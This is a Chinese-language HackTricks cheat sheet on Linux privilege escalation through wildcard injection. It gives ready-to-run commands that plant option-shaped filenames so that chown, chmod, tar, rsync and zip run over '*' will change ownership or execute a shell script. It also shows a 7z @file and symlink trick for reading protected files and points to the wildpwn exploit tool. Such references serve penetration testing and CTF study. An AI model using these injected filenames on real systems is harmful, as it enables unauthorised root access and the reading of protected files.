hacktricks/linux-hardening/privilege-escalation/wildcards-spare-tricks.md

4.5 KiB
Raw Blame History

从零开始学习AWS黑客技术成为专家 htARTEHackTricks AWS Red Team Expert

其他支持HackTricks的方式

chown, chmod

您可以指定要为其余文件复制的文件所有者和权限

touch "--reference=/my/own/path/filename"

您可以使用https://github.com/localh0t/wildpwn/blob/master/wildpwn.py _(combined attack)_来利用此漏洞
更多信息请参考https://www.exploit-db.com/papers/33930

Tar

执行任意命令:

touch "--checkpoint=1"
touch "--checkpoint-action=exec=sh shell.sh"

您可以使用https://github.com/localh0t/wildpwn/blob/master/wildpwn.py _(tar attack)_来利用此漏洞
更多信息请参考https://www.exploit-db.com/papers/33930

Rsync

执行任意命令:

Interesting rsync option from manual:

-e, --rsh=COMMAND           specify the remote shell to use
--rsync-path=PROGRAM    specify the rsync to run on remote machine
touch "-e sh shell.sh"

你可以使用https://github.com/localh0t/wildpwn/blob/master/wildpwn.py (rsync攻击) 来利用这个漏洞。
更多信息请参考https://www.exploit-db.com/papers/33930

7z

7z中,即使在*之前使用--(请注意--表示以下输入不能被视为参数因此在这种情况下只能是文件路径你也可以造成任意错误以读取文件因此如果类似以下命令正在以root权限执行

7za a /backup/$filename.zip -t7z -snl -p$pass -- *

并且您可以在执行此操作的文件夹中创建文件,您可以创建文件@root.txt和文件root.txt作为符号链接指向您想要读取的文件:

cd /path/to/7z/acting/folder
touch @root.txt
ln -s /file/you/want/to/read root.txt

然后,当执行7z时,它会将root.txt视为包含应压缩的文件列表的文件(这就是@root.txt存在的意义当7z读取root.txt时,它将读取/file/you/want/to/read由于此文件的内容不是文件列表,它将抛出错误并显示内容。

更多信息请参阅HackTheBox的CTF比赛中的Write-ups。

Zip

执行任意命令:

zip name.zip files -T --unzip-command "sh -c whoami"
从零开始学习AWS黑客技术成为专家 htARTEHackTricks AWS Red Team Expert

其他支持HackTricks的方式